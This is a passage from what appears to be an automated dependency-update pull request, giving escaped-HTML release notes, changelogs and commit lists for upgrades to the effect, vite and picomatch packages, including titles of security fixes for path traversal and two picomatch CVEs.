\u003ccode\u003eSchema.Struct\u003c/code\u003e containing \u003ccode\u003eSchema.optionalWith\u003c/code\u003e with \u003ccode\u003e{ default }\u003c/code\u003e, \u003ccode\u003e{ as: \u0026quot;Option\u0026quot; }\u003c/code\u003e, \u003ccode\u003e{ nullable: true }\u003c/code\u003e, or similar options would throw \u003ccode\u003e\u0026quot;Unsupported schema (Transformation)\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6097\"\u003e#6097\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/f6b0960bf3184109920dfed16ee7dfd7d67bc0f2\"\u003e\u003ccode\u003ef6b0960\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/gcanti\"\u003e\u003ccode\u003e@​gcanti\u003c/code\u003e\u003c/a\u003e! - Fix TupleWithRest post-rest validation to check each tail index sequentially.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eeffect@3.19.19\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6079\"\u003e#6079\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - add short circuit to fiber.await internals\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6079\"\u003e#6079\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - build ManagedRuntime synchronously if possible\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6081\"\u003e#6081\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/2d2bb1364a906bd44800c6387b9575fddccdaf53\"\u003e\u003ccode\u003e2d2bb13\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - fix semaphore race condition where permits could be leaked\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eeffect@3.19.18\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6062\"\u003e#6062\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/12b1f1eadf649e30dec581b7351ba3abb12f8004\"\u003e\u003ccode\u003e12b1f1e\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - prevent Stream.changes from writing empty chunks\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eeffect@3.19.17\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6040\"\u003e#6040\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/a8c436f7004cc2a8ce2daec589ea7256b91c324f\"\u003e\u003ccode\u003ea8c436f\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/jacobconley\"\u003e\u003ccode\u003e@​jacobconley\u003c/code\u003e\u003c/a\u003e! - Fix \u003ccode\u003eStream.decodeText\u003c/code\u003e to correctly handle multi-byte UTF-8 characters split across chunk boundaries.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Effect-TS/effect/blob/main/packages/effect/CHANGELOG.md\"\u003eeffect's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.20.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6124\"\u003e#6124\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/8798a843218e6c0c0d3a8eee83360880e370b4da\"\u003e\u003ccode\u003e8798a84\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/mikearnaldi\"\u003e\u003ccode\u003e@​mikearnaldi\u003c/code\u003e\u003c/a\u003e! - Fix scheduler task draining to isolate \u003ccode\u003eAsyncLocalStorage\u003c/code\u003e across fibers.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6107\"\u003e#6107\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/fc82e81448bd9136a37580139ce46a2c61b11b54\"\u003e\u003ccode\u003efc82e81\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/gcanti\"\u003e\u003ccode\u003e@​gcanti\u003c/code\u003e\u003c/a\u003e! - Backport \u003ccode\u003eTypes.VoidIfEmpty\u003c/code\u003e to 3.x\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6088\"\u003e#6088\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/82996bce8debffcb44feb98bb862cf2662bd56b7\"\u003e\u003ccode\u003e82996bc\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/taylorOntologize\"\u003e\u003ccode\u003e@​taylorOntologize\u003c/code\u003e\u003c/a\u003e! - Schema: fix \u003ccode\u003eSchema.omit\u003c/code\u003e producing wrong result on Struct with \u003ccode\u003eoptionalWith({ default })\u003c/code\u003e and index signatures\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003egetIndexSignatures\u003c/code\u003e now handles \u003ccode\u003eTransformation\u003c/code\u003e AST nodes by delegating to \u003ccode\u003east.to\u003c/code\u003e, matching the existing behavior of \u003ccode\u003egetPropertyKeys\u003c/code\u003e and \u003ccode\u003egetPropertyKeyIndexedAccess\u003c/code\u003e. Previously, \u003ccode\u003eSchema.omit\u003c/code\u003e on a struct combining \u003ccode\u003eSchema.optionalWith\u003c/code\u003e (with \u003ccode\u003e{ default }\u003c/code\u003e, \u003ccode\u003e{ as: \u0026quot;Option\u0026quot; }\u003c/code\u003e, etc.) and \u003ccode\u003eSchema.Record\u003c/code\u003e would silently take the wrong code path, returning a Transformation with property signatures instead of a TypeLiteral with index signatures.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6086\"\u003e#6086\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4d97a61a15b9dd6a0eece65b8f0c035e16d42ada\"\u003e\u003ccode\u003e4d97a61\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/taylorOntologize\"\u003e\u003ccode\u003e@​taylorOntologize\u003c/code\u003e\u003c/a\u003e! - Schema: fix \u003ccode\u003egetPropertySignatures\u003c/code\u003e crash on Struct with \u003ccode\u003eoptionalWith({ default })\u003c/code\u003e and other Transformation-producing variants\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003eSchemaAST.getPropertyKeyIndexedAccess\u003c/code\u003e now handles \u003ccode\u003eTransformation\u003c/code\u003e AST nodes by delegating to \u003ccode\u003east.to\u003c/code\u003e, matching the existing behavior of \u003ccode\u003egetPropertyKeys\u003c/code\u003e. Previously, calling \u003ccode\u003egetPropertySignatures\u003c/code\u003e on a \u003ccode\u003eSchema.Struct\u003c/code\u003e containing \u003ccode\u003eSchema.optionalWith\u003c/code\u003e with \u003ccode\u003e{ default }\u003c/code\u003e, \u003ccode\u003e{ as: \u0026quot;Option\u0026quot; }\u003c/code\u003e, \u003ccode\u003e{ nullable: true }\u003c/code\u003e, or similar options would throw \u003ccode\u003e\u0026quot;Unsupported schema (Transformation)\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6097\"\u003e#6097\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/f6b0960bf3184109920dfed16ee7dfd7d67bc0f2\"\u003e\u003ccode\u003ef6b0960\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/gcanti\"\u003e\u003ccode\u003e@​gcanti\u003c/code\u003e\u003c/a\u003e! - Fix TupleWithRest post-rest validation to check each tail index sequentially.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.19.19\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6079\"\u003e#6079\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - add short circuit to fiber.await internals\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6079\"\u003e#6079\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - build ManagedRuntime synchronously if possible\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6081\"\u003e#6081\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/2d2bb1364a906bd44800c6387b9575fddccdaf53\"\u003e\u003ccode\u003e2d2bb13\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - fix semaphore race condition where permits could be leaked\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.19.18\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6062\"\u003e#6062\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/12b1f1eadf649e30dec581b7351ba3abb12f8004\"\u003e\u003ccode\u003e12b1f1e\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - prevent Stream.changes from writing empty chunks\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.19.17\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6040\"\u003e#6040\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/a8c436f7004cc2a8ce2daec589ea7256b91c324f\"\u003e\u003ccode\u003ea8c436f\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/jacobconley\"\u003e\u003ccode\u003e@​jacobconley\u003c/code\u003e\u003c/a\u003e! - Fix \u003ccode\u003eStream.decodeText\u003c/code\u003e to correctly handle multi-byte UTF-8 characters split across chunk boundaries.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.19.16\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6018\"\u003e#6018\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/e71889f35b081d13b7da2c04d2f81d6933056b49\"\u003e\u003ccode\u003ee71889f\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/codewithkenzo\"\u003e\u003ccode\u003e@​codewithkenzo\u003c/code\u003e\u003c/a\u003e! - fix(Match): handle null/undefined in \u003ccode\u003eMatch.tag\u003c/code\u003e and \u003ccode\u003eMatch.tagStartsWith\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eAdded null checks to \u003ccode\u003ediscriminator\u003c/code\u003e and \u003ccode\u003ediscriminatorStartsWith\u003c/code\u003e predicates to prevent crashes when matching nullable union types.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/aa473938a53d07837e84935329f4891a7d591c3b\"\u003e\u003ccode\u003eaa47393\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6089\"\u003e#6089\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/8798a843218e6c0c0d3a8eee83360880e370b4da\"\u003e\u003ccode\u003e8798a84\u003c/code\u003e\u003c/a\u003e fix(effect): isolate scheduler runners per fiber (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6124\"\u003e#6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/fc82e81448bd9136a37580139ce46a2c61b11b54\"\u003e\u003ccode\u003efc82e81\u003c/code\u003e\u003c/a\u003e Backport \u003ccode\u003eTypes.VoidIfEmpty\u003c/code\u003e to 3.x (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6107\"\u003e#6107\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/f6b0960bf3184109920dfed16ee7dfd7d67bc0f2\"\u003e\u003ccode\u003ef6b0960\u003c/code\u003e\u003c/a\u003e Backport: Fix TupleWithRest post-rest index drift validation bug (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6097\"\u003e#6097\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/82996bce8debffcb44feb98bb862cf2662bd56b7\"\u003e\u003ccode\u003e82996bc\u003c/code\u003e\u003c/a\u003e fix(Schema): handle Transformation in getIndexSignatures for correct omit beh...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/4d97a61a15b9dd6a0eece65b8f0c035e16d42ada\"\u003e\u003ccode\u003e4d97a61\u003c/code\u003e\u003c/a\u003e Schema: fix getPropertySignatures crash on Struct with optionalWith({ default...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/ab3b64c20a039eb4d573fe757c41278925b22687\"\u003e\u003ccode\u003eab3b64c\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6080\"\u003e#6080\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/2d2bb1364a906bd44800c6387b9575fddccdaf53\"\u003e\u003ccode\u003e2d2bb13\u003c/code\u003e\u003c/a\u003e fix semaphore race condition where permits could be leaked (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6081\"\u003e#6081\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e build ManagedRuntime synchronously if possible (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6079\"\u003e#6079\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/4f2107548fa64c21a8643b7b0efcd556cd16d4b9\"\u003e\u003ccode\u003e4f21075\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6063\"\u003e#6063\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/Effect-TS/effect/commits/effect@3.20.0/packages/effect\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `vite` from 7.3.1 to 7.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/releases\"\u003evite's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.3.2\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v7.3.2/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/blob/v7.3.2/packages/vite/CHANGELOG.md\"\u003evite's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e\u003ca href=\"https://github.com/vitejs/vite/compare/v7.3.1...v7.3.2\"\u003e7.3.2\u003c/a\u003e (2026-04-06)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eavoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22161\"\u003e#22161\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/09d8c903bde12fee2710314d3b42bc789c686df7\"\u003e09d8c90\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ebackport \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22159\"\u003e#22159\u003c/a\u003e, apply server.fs check to env transport (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22162\"\u003e#22162\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/19db0f29c3a3ac4e64cc95c270716c77fd223ad1\"\u003e19db0f2\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echeck \u003ccode\u003eserver.fs\u003c/code\u003e after stripping query as well (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22160\"\u003e#22160\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/f8103cc946f137a54e395fe3f5d08e8209231ed6\"\u003ef8103cc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/cc383e07b66d4c5a9768fcb570e0af812cb8d999\"\u003e\u003ccode\u003ecc383e0\u003c/code\u003e\u003c/a\u003e release: v7.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/09d8c903bde12fee2710314d3b42bc789c686df7\"\u003e\u003ccode\u003e09d8c90\u003c/code\u003e\u003c/a\u003e fix: avoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22161\"\u003e#22161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/f8103cc946f137a54e395fe3f5d08e8209231ed6\"\u003e\u003ccode\u003ef8103cc\u003c/code\u003e\u003c/a\u003e fix: check \u003ccode\u003eserver.fs\u003c/code\u003e after stripping query as well (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22160\"\u003e#22160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/19db0f29c3a3ac4e64cc95c270716c77fd223ad1\"\u003e\u003ccode\u003e19db0f2\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22159\"\u003e#22159\u003c/a\u003e, apply server.fs check to env transport (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22162\"\u003e#22162\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/vitejs/vite/commits/v7.3.2/packages/vite\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `picomatch` from 2.3.1 to 2.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/releases\"\u003epicomatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.3.2\u003c/h2\u003e\n\u003cp\u003eThis is a security release fixing several security relevant issues.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: exception when glob pattern contains constructor by \u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\"\u003eCVE-2026-33671\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\"\u003eCVE-2026-33672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ehttps://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/blob/master/CHANGELOG.md\"\u003epicomatch's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease history\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eAll notable changes to this project will be documented in this file.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"http://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e\nand this project adheres to \u003ca href=\"http://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003eChangelogs are for humans, not machines.\u003c/li\u003e\n\u003cli\u003eThere should be an entry for every single version.\u003c/li\u003e\n\u003cli\u003eThe same types of changes should be grouped.\u003c/li\u003e\n\u003cli\u003eVersions and sections should be linkable.\u003c/li\u003e\n\u003cli\u003eThe latest version comes first.\u003c/li\u003e\n\u003cli\u003eThe release date of each versions is displayed.\u003c/li\u003e\n\u003cli\u003eMention whether you follow Semantic Versioning.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eChangelog entries are classified using the following labels \u003cem\u003e(from \u003ca href=\"http://keepachangelog.com/\"\u003ekeep-a-changelog\u003c/a\u003e\u003c/em\u003e):\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eAdded\u003c/code\u003e for new features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eChanged\u003c/code\u003e for changes in existing functionality.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eDeprecated\u003c/code\u003e for soon-to-be removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eRemoved\u003c/code\u003e for now removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eFixed\u003c/code\u003e for any bug fixes.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eSecurity\u003c/code\u003e in case of vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e4.0.0 (2024-02-07)\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix bad text values in parse \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/126\"\u003e#126\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/connor4312\"\u003e\u003ccode\u003e@​connor4312\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove process global to work outside of node \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/129\"\u003e#129\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/styfle\"\u003e\u003ccode\u003e@​styfle\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd sideEffects to package.json \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/128\"\u003e#128\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/frandiox\"\u003e\u003ccode\u003e@​frandiox\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved \u003ccode\u003eos\u003c/code\u003e, make compatible browser environment. See \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/124\"\u003e#124\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/gwsbhqt\"\u003e\u003ccode\u003e@​gwsbhqt\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.1\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/81cba8d4b767cab3cb29d26eb4f691eed75b73b2\"\u003e\u003ccode\u003e81cba8d\u003c/code\u003e\u003c/a\u003e Publish 2.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/fc1f6b69006e9435caf8fb40d8aff378bc0b7bce\"\u003e\u003ccode\u003efc1f6b6\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/eec17aee5428a7249e9ca5adbb8a0d28fa29619b\"\u003e\u003ccode\u003eeec17ae\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/78f8ca4362d9e66cadea97b93e292f10096452ed\"\u003e\u003ccode\u003e78f8ca4\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/156\"\u003e#156\u003c/a\u003e from micromatch/backport-144\u003c/li\u003e\n\u003cli\u003e\u003ca 